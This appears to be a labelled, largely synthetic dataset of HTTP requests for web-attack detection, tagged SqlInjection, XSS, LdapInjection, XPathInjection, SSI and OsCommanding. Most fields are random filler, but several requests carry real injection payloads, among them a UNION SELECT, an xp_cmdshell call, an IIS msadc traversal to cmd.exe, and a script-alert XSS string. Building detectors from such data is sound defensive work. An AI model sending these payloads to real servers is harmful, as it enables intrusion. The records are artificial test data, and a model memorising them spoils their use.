TE: trailers,deflate,trailers
Trailer: Trailer
User-Agent: Mozilla/0.9 (compatible; MSIE 7.6; WinNT; sr2efLt4H; 6GdetSohsn)
UA-Disp: 720,181,16
UA-OS: Win95
UA-Pixels: 348x583
Via: AeLbrh/1.5 150.55.64.113, xeaI/2.3 www.qtcqiai.css
Transfer-Encoding: identity
Upgrade: On7s/8.1, tyoz/0.4, mssy/6.5, iod/0.2, tor/9.7
Warning: 810 www.r8tfa.html "9eupeieelbhiq8etsrA" 
X-Forwarded-For: 152.33.64.46
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48440
Start - Id: 41371
class: SqlInjection
PUT /nw/syflyon9ot/aetsdetohg854oH/oWvUF8h@riF3s.C/H0likeBUmwBncstjBprocessing-instruction/5etyteo/ddets7/zmmsm6rey2l4rchhdesT/P0Anryntoetsnee.asmx? HTTP/1.1
Content-Length: 307
Content-Language: kui
Content-Encoding: gzip
Content-Location: http://www.caviimn.be/m7eC/7ccb/ausTzzC/tNSisltt/eH95ti.html
Content-MD5: em0wYW5kMXVmNTlFeFRzZA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 15 May 09 22:04:14 CET
Last-Modified: Mon, 31 Jul 06 05:35:08 CET
Host: www.g4yeeeh.de
Connection: keep-alive
Accept: image/jpeg;q=0.1, image/*, video/mpeg
Accept-Charset: windows-1254;q=0.0, utf-8, iso-8859-8;q=0.1, x-mac-arabic;q=0.3, utf-8;q=0.8
Accept-Encoding: identity
Accept-Language: *;q=0.0
Cache-Control: min-fresh=1504
Client-ip: 200.4.215.226
Cookie: d0varF6SFBDH='uw~ eo4u\tmadcm\i;eseoa=dKYcjSUK
Cookie2: $Version="234"
Date: Wed, 05 Mar 08 06:54:08 UTC
ETag: "1szJG5Qqdon.9toUC3"
Expect: b0lpp=toalgtto;n4syos
From: wvycy@8isLoesg.de
If-Modified-Since: Sun, 09 Jul 06 06:46:40 UTC
If-Unmodified-Since: Sat, 28 Mar 09 13:40:00 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 01 May 06 06:36:21 GMT
Max-Forwards: 35
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM dG9ub1NydW50OUF5YWJudHluc3RhQnphaHB1d2l6dmFkaTRGdmlobnM=
Authorization: Basic eWltd286ZWl6cmQ=
Range: 32232-38984,57-
Referer: /ynaes/exaa/Tesnhg/0eeO.tiff
TE: deflate,trailers,chunked
Trailer: Accept-Language
User-Agent: dt1tep/3.1.9.9.6
UA-Disp: 320,3937,32
UA-OS: Windows NT
UA-Color: color32
Via: HTTP/5.9 172.53.5.70:134
Transfer-Encoding: compress
Upgrade: nto/6.6, ero7er/3.3, Axmpf/2.4
Warning: 930 168.40.198.240 "aetrpi0rwwtHsS" 
X-Serial-Number: 102930294622
----: --------------

reuizaED=Sak1fiLthn&gutsi9oejei=44148&fe='    )  UNION     ALL   SELECT     'lseMeon',966,2908,'pnaar3siot',517     FROM     Lvw    WHERE   ('' =   '&h5si=- 7&rdneouh=ih3TvdhehloT&eihoeccak=ediv%esa9sdor2ga&winntxboot.inimailconnect=xersjsA&@nzWq6gn2=tamzlrphp@zInull@hge

End - Id: 41371
Start - Id: 35141
class: SqlInjection
POST /aWd98IG.dll? HTTP/1.0
Content-Length: 51
Content-Language: ia6
Content-Encoding: compress
Content-Location: /ersxhr.asmx
Content-MD5: cmFwaXNhanV2bGhnRWgxaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 20 Apr 08 09:06:50 UTC
Last-Modified: Sun, 21 Mar 10 08:51:33 CET
Host: 217.72.41.156:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-chinesesimp, iso-2022-jp;q=0.0, euc-kr, macintosh;q=0.2, iso-2022-jp
Accept-Encoding: *;q=0.5
Accept-Language: mkodaGh-rjdie;q=0.0, qtdr8xtr-me;q=0.6, mzso-N6, i-tO;q=0.6
Cache-Control: min-fresh=3891
Client-ip: 104.27.173.11
Cookie: hChhqlwnfoeir2=ul;sJy=elnucoounionmoala;osnuneaR=et;8iws2r=cmdi;msAhroaysesot=toleiee
Cookie2: $Version="374"
Date: Sun, 27 Feb 05 07:32:29 GMT
ETag: W/"98S_zUCS1aSpT_Sf"
Expect: eel5Noee
From: mbaudh4h@tcta.net
If-Modified-Since: Tue, 09 Mar 10 05:21:09 CET
If-Unmodified-Since: Mon, 12 Dec 05 09:48:43 UTC
If-Match: "fbrkAD_A5ucqvcDj@"
If-None-Match: "xAeDUQ3e7hTvFHvOCvd"
If-Range: Tue, 22 Jun 04 10:44:19 UTC
Max-Forwards: 00
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest username="e7tedn"
Authorization: NTLM bGFlM0hpYnN0Ymlkb3AzaDFlb2lvZnVjcm5Tbmxyc2FoYTZkbQ==
Range: 63-383,700-,-5
Referer: /ruos/vaenaava/teutnim/mU4sI/eTefi.ace
TE: trailers
User-Agent: Mozilla/0.5 (X11; U; Open BSD i586 5.9; oa-eb; rv:0.3.2) Gecko/66753429
UA-Disp: 3713,1872,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9440x873
Via: FTP/0.3 57.254.8.61:69695, HTTP/8.6 74.174.21.134
Transfer-Encoding: identity
Upgrade: pt5etn/1.8, Epd/4.6, nuba/1.0, kixdml/0.4, fecwi/7.2
X-Forwarded-For: 126.226.47.150
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

t3d5th=OR    63>570057936314&is=ghimailv%eobaaa

End - Id: 35141
Start - Id: 39330
class: SSI
GET /lsdQgjnc/oqmf5xoneiiezagmow/Zwn.nsf?ncs9h=y%2FdocumentRs&nSgnodecEt=o_1Uo5&1meirro2=lCwEl7&leoaieciic=%3C%21--%23email+fromhost%3D%22www.dtd0sLus.com%22+tohost%3D%22mailbox.Lie.com%22+message%3D%224s4e+eoblvp+bi+idwE%22+fromaddress%3D%22aPd9ls.com%22+toaddress%3D%22ITun.onk.com%22+subject%3D%22no%22+sender%3D%22ge.com%22+replyto%3D%22riee8er.com%22+cc%3D%22gao%22+inreplyto%3D%22oemm+ubE+9eFha%22+id%3D%223ejFgmail%22+--%3E&ePLmaRimg9=onAa6n&u8Sigx1onasAoe=878526679&uEoyr1=brdinsertrsejexac-ecl&qiAxyn=065 HTTP/1.0
Host: www.eiertscp.it:80
Connection: ai2io
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: gzip;q=0.8, deflate;q=0.6
Accept-Language: eujM-ng, ycek2-ra;q=0.8, oa5esb-hifbFis;q=0.3
Cache-Control: min-fresh=63
Client-ip: 108.73.42.141
Cookie: odgoo=D1tfi;eeEn5xg2eSa=184788;ehr18=5869314189;rle= &Saoheh
Cookie2: $Version="998"
Date: Mon, 11 Oct 04 21:56:11 UTC
ETag: "JlPV01Vps_Aje@9LfsF"
Expect: 100-continue
From: fiaotu@eNeFi.it
If-Modified-Since: Sat, 06 Nov 04 01:33:26 UTC
If-Unmodified-Since: Thu, 23 Apr 09 02:09:14 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 19 Mar 10 23:09:39 CET
Max-Forwards: 86
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: NTLM dDF5cXlCY2FlcnMwZ3RveXJlbHQ4b0Vhc1R5cmhvaGFvaGU4c2Q=
Authorization: NTLM c2RBb3NidXRhNmFlVHJ3c2Vlc1V4aG1kZGV4cm9Fb2Vxcg==
Range: -7892
Referer: http://mnohos.ch/eeutq/itxoe/IoilYts/ioime.msf
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/3.5 (X11; U; Unix 7.7; po-ne; rv:6.2.6) Gecko/58649890
UA-CPU: x86
UA-Disp: 593,4970,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9132x248
Via: HTTP/6.0 123.127.180.111
Transfer-Encoding: deflate
Upgrade: hsyn/7.1
Warning: 603 www.gfjcoE2.gif "tntsi" "Thu, 02 Nov 06 09:59:58 UTC"
X-Forwarded-For: 135.206.207.129
X-Serial-Number: 802337450581
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39330
Start - Id: 41768
class: SqlInjection
GET /eAM-@ozi7u46A7Qp1Jgu/bIOTVS/ehd2Wp66gC1S68zFPs/lsW/_FB/aecpd8thowfesnafe/c@Qconnect3a4iMNZ16/ftp0Wxaccess_logGcJM.asmx?UQWk-M_X=o%3Errd&weecniwe=03747&ejjhtpsatltmoj=2215831609&hldkw=4801776&akee1=146&uli=ato&yuTnq=ualtcrbi1tpduotS&acccno=34999829&UaolsheL=OR+%27yrr4%27+++++%3D+%27Sim%27%2B%27ple%27&tooiesaNsectoiR=03442270&sorrrials=34&ai=726&ishSsh690irtch=%3Aai%28e&5maeetaenz2tdr=25182248 HTTP/1.1
Host: www.mncNx.gov
Connection: close
Accept: */*;q=0.7
Accept-Charset: euc-cn;q=0.5, iso-8859-7, iso-8859-5;q=0.9, x-mac-cyrillic, x-mac-korean;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 141.135.3.12
Cookie: rr=lrtputwnhr;is3aptprVe70eS=aetuhh;r9a72e=88157
Cookie2: $Version="0"
Date: Thu, 28 Apr 05 13:54:51 CET
ETag: "Ml8sUtHi-YLnzJaoSF"
Expect: osevnd
From: lngs3f@sl6ee5rs.it
If-Modified-Since: Thu, 06 Apr 06 12:29:25 CET
If-Unmodified-Since: Sun, 23 May 04 05:53:53 GMT
If-Match: *
If-None-Match: "PmtHBgQaBOwBkK8Hp"
If-Range: Sat, 12 Dec 09 21:04:19 CET
Max-Forwards: 9356
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM bnR0b1I2ZWVzdGlybmVJaG5lOG1lbm43YmV0dGFmbW4yZXdlTg==
Authorization: NTLM bDZxZXdoeTV3NmRlYXNtZXNoZXJ1eWRlNmFsZGFodDVsbHR5Yg==
Range: 4234-490888,-164882
Referer: /vlrbndzn/htfr/spittc/pLooz.cgi
TE: gzip;q=0.2
Trailer: Upgrade
User-Agent: 0ge85Zo/0.1.0.8
UA-CPU: 68000
UA-Disp: 740,6527,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5624x146
Via: FTP/6.6 80.232.6.242:88, 5.7 www.ltjet.js, 8.0 138.214.11.40
Transfer-Encoding: compress
Upgrade: hyt/2.3, usSsro/3.3, qhndkt/3.2, ay8/2.2
Warning: 047 www.s7aieai.js "nisluLPLAsoy" "Fri, 29 Jun 07 15:53:33 GMT"
X-Forwarded-For: 126.254.87.29
X-Serial-Number: 79451842006720281
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 41768
Start - Id: 37409
class: LdapInjection
GET /8tio.shtml?NL7mZps2uSmeta=sAfErsl&nnts3isntmh=mdmcog4aoe&rsHUZris=wgqocto&Ni4otRt3ei2aAnh=drV-&tvcjnfgduotg=4&O6xfnetcatuXEJr=t&aYwUlreplacePt6hh1=tnIDkcUbQ&oehfafou=0y&hephcneaanyio6=kGme8LU&DkT9HI=asn%25smdivDh%3C&toienopahtz=hcFoI&rxT4a=upasswdnh&waseu0=3599136806&k2at=eXdzB7C5yO HTTP/1.1
Host: www.msga.biz
Connection: hlbMnCr
Accept: image/png;q=0.6, text/*;q=0.4, image/gif;q=0.4
Accept-Charset: iso-8859-6;q=0.1, x-mac-arabic, koi8-r;q=0.0
Accept-Encoding: compress;q=0.7, gzip, compress
Accept-Language: *;q=0.6
Cache-Control: rrmpK='sAldhuiW'
Client-ip: 112.62.22.134
Cookie: 7iasgss=2186904;r2Pht7h=au20ia|e fm;nvtNdnmadayeI=ogr5t)(&(objectClass  =an*);se=E&e
Cookie2: $Version="8"
Date: Fri, 16 Apr 10 11:40:05 CET
ETag: W/"B56Etk_YaK43H5-"
Expect: 100-continue
From: 3ear@vimqehoae.fr
If-Modified-Since: Fri, 10 Jul 09 08:36:34 CET
If-Unmodified-Since: Wed, 03 Mar 10 05:09:21 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 10 Dec 08 06:02:48 CET
Max-Forwards: 527
MIME-Version: 8.7
Pragma: seaeam=ssl
Proxy-Authorization: Digest algorithm=MD5
Authorization: wqA8Ir sa7ahs9=pksae
Range: 082112-540,03898-739302,66-304
Referer: /ot1d/7iemin/rsHe/rneYqi.asmx
TE: chunked
Trailer: Accept-Language
User-Agent: Mozilla/7.7 (Machintosh; U; Mac OS X 4.9; tb-oo; rv:4.5.2) Gecko/09441304
UA-Disp: 143,2118,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 005x049
Via: 6.0 65.112.4.91
Transfer-Encoding: identity
Upgrade: sdkeds/7.2, acodv8/1.5, netitb/9.6
Warning: 484 162.210.1.122:4855 "Sno4bUackumklest" 
X-Forwarded-For: 165.215.42.96
X-Serial-Number: 50103674881121
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37409
Start - Id: 44325
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 213.235.79.219
Connection: close
Accept: text/*, application/*;q=0.7
Accept-Charset: iso-8859-1;q=0.0, windows-874;q=0.7, hz-gb-2312;q=0.6, windows-1251, iso-2022-kr;q=0.4
Accept-Encoding: identity, identity;q=0.6, compress;q=0.7
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 224.122.29.23
Cookie: tb=hUUyf-kDZ7;empeibcr2=7colbx
Cookie2: $Version="7"
Date: Mon, 29 Mar 10 03:14:48 CET
ETag: "re19w-qPcxojnD_"
Expect: Isdeea8T=dvor7
From: ssaaei@srTei5is.de
If-Modified-Since: Wed, 14 Oct 09 06:49:02 UTC
If-Unmodified-Since: Mon, 28 Aug 06 01:36:39 UTC
If-Match: "JdkoDYgUCDl1S.n"
If-None-Match: *
If-Range: Wed, 15 Aug 07 13:16:52 UTC
Max-Forwards: 93
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic T2hsMGg6YWFhMg==
Authorization: NTLM cGxwYWFlb3FtU055a2VhaEUzdGVkbjJ0bjlhYnR3aWVvemFteU4=
Range: 88-15414
Referer: http://www.cnnSihi.fr/tanqUf/ekgnaot2/eurdelLn.jsp
TE: deflate;q=0.5
Trailer: If-None-Match
User-Agent: swhie (ejLTDUF; tpQtOq; fyloaB_)
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 127x111
Via: 4.0 www.ttekp.shtml, FTP/3.1 224.85.199.129
Transfer-Encoding: compress
Upgrade: tzsa/1.2, i18be/3.4, iXa/9.5
Warning: 477 www.oeiseg.css:177 "oNngqeeniilu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44325
Start - Id: 49311
class: XPathInjection
GET /pLZM3akCUetoGO/V@KM06XLFmct/w2I6estue4.css?rozeltnk5a=snerhre&desek=rii%29+&tD91jqZBeK5z=820241321&nahtbI0fw=hnC0%27+++or+++++6+++++%3C++++count%28path%2Fchild%3A%3A*%29+++or+%27ehtn%27++++%3D+++%27&zlfi4bpU=4144755825&tcnnnzdow7aew=ns&rrtaoeescuWoS8=osmEhWvtrdtdijo&iusant=55897835&8m=9980664&m1hf=a%25 HTTP/1.1
Host: www.TebT6.be:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: cp-932;q=0.1, iso-8859-4;q=0.7, iso-8859-8-i;q=0.6, x-mac-arabic, windows-1255;q=0.3
Accept-Encoding: *
Accept-Language: lC0e-ue
Cache-Control: atbbspi='eh0'
Client-ip: 61.235.183.55
Cookie: lnu=rKG;ro4=genenoiudnshyma;Qnph-So=01 seZoeval21;wUi1eynli=422;.aKwmVmOQWhC=7ro;r2G5T3kxp_locationAqC=os8KsRtusoY
Cookie2: $Version="01"
Date: Thu, 13 Oct 05 19:17:06 CET
ETag: W/"5oOwunHRVio4Nk9"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Wed, 22 Jun 05 21:26:43 CET
If-Unmodified-Since: Fri, 03 Sep 04 17:15:53 UTC
If-Match: "BWbgw41M@d1TKoR"
If-None-Match: *
If-Range: Fri, 18 Nov 05 04:26:47 CET
Max-Forwards: 504
MIME-Version: 7.2
Pragma: lwr='lh'
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: Basic ZVNFSlU6MDR0bGNl
Range: 28823-,87212-
Referer: /qaNUal/2el9le/lvnt/tsnaia.cfm
TE: gzip;q=0.4,trailers
Trailer: Upgrade
User-Agent: Mozilla/0.2 (X11; U; Open BSD i386 4.1; ey-hh; rv:7.6.9) Gecko/77333866
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 016x6303
Via: 8.7 www.R8ag.htm
Transfer-Encoding: identity
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 623 193.252.199.121 "khrNsixEqbqewainsMhL" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 8829334144305
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49311
Start - Id: 36396
class: OsCommanding
PUT /dpR0/w.2NBKDU1DyhEkFw/epczyisdr4sva/JV/nHCGOrThTEXhkJSCFW.shtml? HTTP/1.0
Content-Length: 319
Content-Language: i6h
Content-Encoding: deflate
Content-Location: /ceodH3/REooet/F8hos/O7wiT.cfm
Content-MD5: Z2ZJamJmb3MwZXN2ZWhFZA==
Content-Type: application/x-www-form-urlencoded
Host: www.ovoae.net
Connection: hmiyelUs
Accept: */*
Accept-Charset: euc-tw;q=0.6, windows-1250;q=0.7, euc-tw;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: Ita=emon
Date: Sat, 15 Dec 07 16:20:09 GMT
If-Match: "Hh6PEtF.K1C-NUfURhS"
Max-Forwards: 839
MIME-Version: 2.5
Authorization: Basic cm5zYzpsajNldDJuMg==
Range: 57553-
Referer: http://www.gsal.gov/xaHh/l0ni/Ip2cedh/bbe7neu/dtOdlad.bin
TE: gzip;q=0.6
User-Agent: Mozilla/2.0 (compatible; ehTs; Open BSD i586; Usiun)
Via: 4.0 25.6.51.114

xhatei2ss=46546649&ecchpdenn=ejaee&3CNA1ctlm=a r&5tiaesobmo=08&RCIs=cmtoZCxlB&pedsRtTmgtldn=45729312&hoam2fooudnisn=etcIaleh:n| \&Yadmin8WGifzXDkdiv=1hhsqna/rm&3ndh=o9ayn&tt3sa=mnolT&eootIdla=661919&y0JPwp-J1=52739750&wrpv=exec xp_cmdshell '"T2ghaseade"     >>   script.vbs'&oea=ndxct\EoqCFptreyi 

End - Id: 36396
Start - Id: 49728
class: XPathInjection
GET /Uoktetnpicleiah/jfMs6li/0rydiserb/aLfvG3H@Cqmam/l0Tepint/iIyFzhnZOy.reeKI_U.gif?7bIKky7kj3p=7540&zmRz7tmpLG=j%2Fmm1o%2Fa%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D618%5D++or+++%27if%27+++%3D%27&cikdnntt=bon- HTTP/1.1
Host: 234.28.210.150
Connection: st12
Accept: text/*;q=0.1, application/*, application/postscript;q=0.1
Accept-Charset: ks_c_5601-1987;q=0.7, koi8-r, iso-8859-4;q=0.9
Accept-Encoding: compress;q=0.5
Accept-Language: eeAt-wer3HI
Cache-Control: max-age=1
Client-ip: 24.134.122.55
Cookie: gahEzdoooegq=s0dYvreorI;rUClsC=o0;2sluh3eeoEo=08822
Cookie2: $Version="403"
Date: Sat, 06 Mar 10 01:48:46 CET
ETag: "JYMP4D0.htFnvfn"
Expect: 9lm8o
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Sun, 01 Feb 09 13:25:53 GMT
If-Unmodified-Since: Wed, 10 Jun 09 11:31:13 UTC
If-Match: "FdxqOXTX2adOvd4q"
If-None-Match: *
If-Range: Sun, 14 May 06 10:21:04 GMT
Max-Forwards: 6
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iest9re"
Authorization: Basic OTFuZWxlOmFvZXM=
Range: -37003,-5,-1
Referer: /gsgtr.rar
TE: trailers
Trailer: Via
User-Agent: utidc/9.6.2
UA-CPU: StrongARM
UA-Disp: 3498,894,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6094x1402
Via: 9.9 www.teez.gif, 6.7 www.wlycsnOx.js, 4.7 www.leys.png
Transfer-Encoding: deflate
Upgrade: 2sv/4.0, uetOn/7.3
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49728
Start - Id: 48628
class: XPathInjection
PUT /tQeYq6AcQwpoEAQM/f8rh0d/iAcnowtJiyn/oNastoheobizeshe7lL/svles/vahemubeatdestbw/mQxho6RbdNJs1/Eqisi7ez/vare3betztnetuc9ntd/bdohat8ge/if-CpDrXmzn2HW9S@@z/AJ7wHobject1YeV.html? HTTP/1.0
Content-Length: 236
Content-Language: 4l6in,osx
Content-Encoding: gzip
Content-Location: http://www.anbtk.be/tnhltt/eIsda/xEh1e.asp
Content-MD5: ZXE1MmV0Y2Rhb2FlM3NjWA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Feb 05 16:20:24 GMT
Last-Modified: Mon, 20 Oct 08 06:30:32 UTC
Host: 241.49.172.55
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: uiaeeh8y-netEo, cccwi109-i, qo9-ynsh, ik-eVtsi;q=0.8, i-tghcoss;q=0.8
Cache-Control: min-fresh=079
Client-ip: 68.45.171.152
Cookie: Timgp7metawj=616549;RuDRx6bTZZA=hiT0didApecaoa;ra=6;tAidEEeT4Njdied=97973639;WconnectI0Z8andnetcat0cS=dwv~tdo
Cookie2: $Version="9"
Date: Sun, 04 Jan 09 02:08:24 CET
ETag: W/"nUus8CIhQ-6I@fzm7nrc"
Expect: 100-continue
From: wsnewerh@atausf.it
If-Modified-Since: Tue, 05 Jan 10 22:58:45 UTC
If-Unmodified-Since: Thu, 05 Jun 08 20:13:58 UTC
If-Match: "5afK2CFx_t3mYcC_K"
If-None-Match: "ETknoUyrhJSSRp0c"
If-Range: Tue, 17 Oct 06 12:48:14 UTC
Max-Forwards: 6801
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM eW5FcXBhcmVnbWJ1cjJhdWFlRTBsbjg1b25ld2N0bmxPVWg=
Authorization: Basic bHQwU3JTTzpSaXhpZWVw
Range: 939-64,563448-00397,65796-
Referer: /Rncn/o7ahpsp/2mOo1arm.gif
TE: deflate;q=0.2
Trailer: Referer
User-Agent: Mozilla/2.9 (Machintosh; U; PPC 0.1; xc-we; rv:0.6.6) Gecko/59286292
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: fsllte/9.8 www.Tctow8.jpg, HTTP/4.6 www.otld.css
Transfer-Encoding: compress
Upgrade: eode/7.7
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 98968
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ThotlcpeQuer=ttmETcsgetscript&okohynl=yuWzeseleuh&fq11X=850951&Eaiuckamnt=prf1']    |    P   |   //user[    name/text(  )    = 'd2&rhk.AV=68010&alnh6hst=a&1lm=1519040&ra=eeefaoiyqaah&aTnT=9362310&Un2=N8thuaka2h7a

End - Id: 48628
Start - Id: 48111
class: XSS
GET /Mq/sisnherextasmu/em/5kfSvpy8/jaruHantsTnvma/nafabetanvi/eUquRUozd45aPMo/sRHllocationXoZvUb.aspx?tetMsmcjatblnyy=43&6exnE=8280466571&gonr=%3Cstyle+++%3E%3C%21--%3C%2Fstyle++++%3E%3Cscript+%3E%5Balert%28%27rd%27%29%3B%5D%2F%2F--%3E%3C%2Fscript+%3E&3ww=h3pyshhp%7Ety&isO=+oi4giu4e5y&1ayoowtWtthtGIf=mlrhflaeaaeE HTTP/1.0
Host: www.unybndo.fr:2969
Connection: 22sr
Accept: image/png, audio/*;q=0.5
Accept-Charset: windows-1255;q=0.6, iso-8859-6, cp-932
Accept-Encoding: 
Accept-Language: *
Cache-Control: es9=ttjneg8
Client-ip: 173.206.204.20
Cookie: aelbotc8w=859163962;MmyWsasrh=H6netuo3tswte
Cookie2: $Version="832"
Date: Mon, 17 Apr 06 12:03:06 GMT
ETag: W/"RfXA@5bMcOaWURhyi"
Expect: 100-continue
From: bnwioIhh@fnmcaAYfe6.de
If-Modified-Since: Fri, 27 Feb 04 15:56:49 CET
If-Unmodified-Since: Wed, 06 May 09 05:49:14 GMT
If-Match: "xPb8iK-qdGXF1uL@"
If-None-Match: "8tHquN_kHMAMOKEl"
If-Range: "edcBr0NRKBaBU8o"
Max-Forwards: 5211
MIME-Version: 3.4
Pragma: 6btc7en=ata
Proxy-Authorization: Digest realm
Authorization: ehtw2 teSjse=oaotilii
Range: 223086-98
Referer: http://www.vuoocst.cz/eopa/mrtzmpO/esfTuw/otnmn.swf
TE: trailers
Trailer: Accept-Charset
User-Agent: qdi7hmApi (eP@A5tAXpY)
UA-CPU: StrongARM
UA-Disp: 367,260,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6001x2247
Via: itc/9.4 www.tnaee3a.gif, ihxe/1.2 22.35.3.209:4, 0.4 186.28.142.209
Transfer-Encoding: deflate
Upgrade: k6wua/1.5, metwv/8.5, seYsb/7.3, xm2ufg/8.4
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 69.186.228.89
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48111
Start - Id: 42238
class: SqlInjection
GET /nt/tcdridzhbtzutt4rEweo/eh4tt/klqfrUJL/iFsJOWl9nEejZGi/ek0nl1@_6TGhx_lz.js?samwC=4886044&d0rqeuea=%27+++OR+++%27r5mpy5r%27+++++%3E++++%27S&ddh9rr=c&wtgdVae3wthr=9ya&ovs5qcsen=a1Eposition5e&d6-UDVAhttpsX0Y=ibxetDaehyojc&ftpBvW8=dLw_h40&itet4mn=s&oaenolqxidrnl=inrtg HTTP/1.1
Host: www.breniWe.be
Connection: esrcHa
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.1
Cache-Control: max-stale=05872
Client-ip: 104.162.121.20
Cookie: fra1oeos= 0etud l3ut ;DfHe1dCMjR=9;he2egNaefe=IrJe xvet-iems9
Cookie2: $Version="26"
Date: Mon, 13 Nov 06 22:58:15 UTC
ETag: W/"I_dMSOn75Rh5PGE"
Expect: 100-continue
From: AhkTtd8@hidg5ir.de
If-Modified-Since: Sun, 10 Apr 05 12:28:44 UTC
If-Unmodified-Since: Fri, 02 Dec 05 05:15:25 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 26 Mar 06 11:02:42 UTC
Max-Forwards: 7
MIME-Version: 1.3
Pragma: sti=semy
Proxy-Authorization: NTLM M2FlbzFvd2R2amFoamFybnhjcWx1dXRkMXZhOXhMaXRtbmtzc2RPYXBl
Authorization: NTLM dXRzb3J6b2xzZTJpd05lZWVhb3JsaWdoNkRlMW5tcmhsb0Zm
Range: 4539-14148,-19,934-
Referer: http://ot9ipe.org/7e1rb/anntmi/Ieaohsk/svqUn0v/udmefd.jpg
TE: trailers,trailers,trailers
Trailer: Expect
User-Agent: lokiyoixowaM
UA-CPU: StrongARM
UA-Disp: 8058,0040,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 108x2342
Via: 9.3 www.zieguner.shtml
Transfer-Encoding: compress
Upgrade: sssi/2.7, rim/3.4, mCeth/1.0, n82sil/5.7
Warning: 028 56.37.102.108 "t6tlhhan1eX2IilnhgP" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42238
Start - Id: 38625
class: LdapInjection
GET /upebtu8cieSl9ometoot/Alh5gnje.gif?0hu=5431&30zxmlBL8nodeQunionyN=pcmit%29%28%26%28objectClass%3D++++wrS*%29&laOxugelhamtat=043&s0f1=1142809&fe=iEi&hra2intat=pechorrmyiMtses%5D-wsmnpac&rt8ntmedanreytO=371207&54l1wh=011&eicimDierhteqci=alts%5Cnnn HTTP/1.1
Host: www.r4i1eon.st
Connection: k5arhu
Accept: video/*, text/*;q=0.9
Accept-Charset: x-mac-greek, koi8;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 146.170.36.188
Cookie: ndu=58976;iecw25z=8296253953;latCL6mY-=630;iRvdeiNuuaej=9863;hbltCgBedOYDTeu=eVjqHmc6T
Cookie2: $Version="788"
Date: Sun, 19 Nov 06 02:11:03 UTC
ETag: "KGrg9qHcq5lQEPfL.Dz"
Expect: 100-continue
From: snRe@zteSps5r.net
If-Modified-Since: Wed, 02 May 07 18:39:13 GMT
